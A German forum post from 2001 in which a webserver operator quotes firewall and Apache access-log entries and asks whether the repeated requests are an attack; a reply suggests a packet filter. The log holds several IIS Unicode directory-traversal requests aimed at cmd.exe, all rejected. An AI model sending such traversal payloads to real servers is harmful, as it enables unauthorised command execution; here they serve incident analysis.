Ich betreibe einen Webserver und habe mal in meine Logfiles geschaut und folgendes festgestellt:
Eintrag aus /var/log/allmessages
<--schnipp--> Nov 15 14:01:50 wgdieleude kernel: SuSE-FW-ACCEPTIN=ppp0 OUT= MAC= SRC=217.225.220.88 DST=217.225.253.74 LEN=52 TOS=0x08 PREC=0x00 TTL=124 ID=18268 DF PROTO=TCP SPT=3144 DPT=80 WINDOW=32767 RES=0x00 SYN URGP=0
OPT
(020405840103030001010402) <--schnapp-->
Da versucht jemand einen Webserver bei Dir zu erreichen! Am besten paketfilter vorschalten! Das habe ich auch!
und das mehrmals in Sekundenabstaenden hintereinander. Das allein waere
ja
noch nicht ungewoehnlich, da jeder Zugriff auf den Webserver einen aehnlichen Eintrag hinterlaest. Allerdings bin ich trotzdem misstrauisch geworden,
da
dies in regelmaesigen Abstaenden passiert. Also habe ich mal einen Blick in das Access-Log des Webserver geschaut und folgendes bemerkt:
<--schnipp--> 217.225.220.88 - - [15/Nov/2001:14:01:16 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 217.225.220.88 - - [15/Nov/2001:14:01:21 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 217.225.220.88 - - [15/Nov/2001:14:01:27 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 217.225.220.88 - - [15/Nov/2001:14:01:33 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 217.225.220.88 - - [15/Nov/2001:14:01:38 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 217.225.220.88 - - [15/Nov/2001:14:01:44 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 <--schnapp-->
Fuer mich sieht das so aus, als wuerde jemand probieren ob auf dem Server WinNT laeuft und dort irgendwelche Kommandos ausfuehren will. Liege ich damit Richtig?
Kann sein, aber zuerst kommt der sogar in den Apachen rein!
Tschüss Josef Müller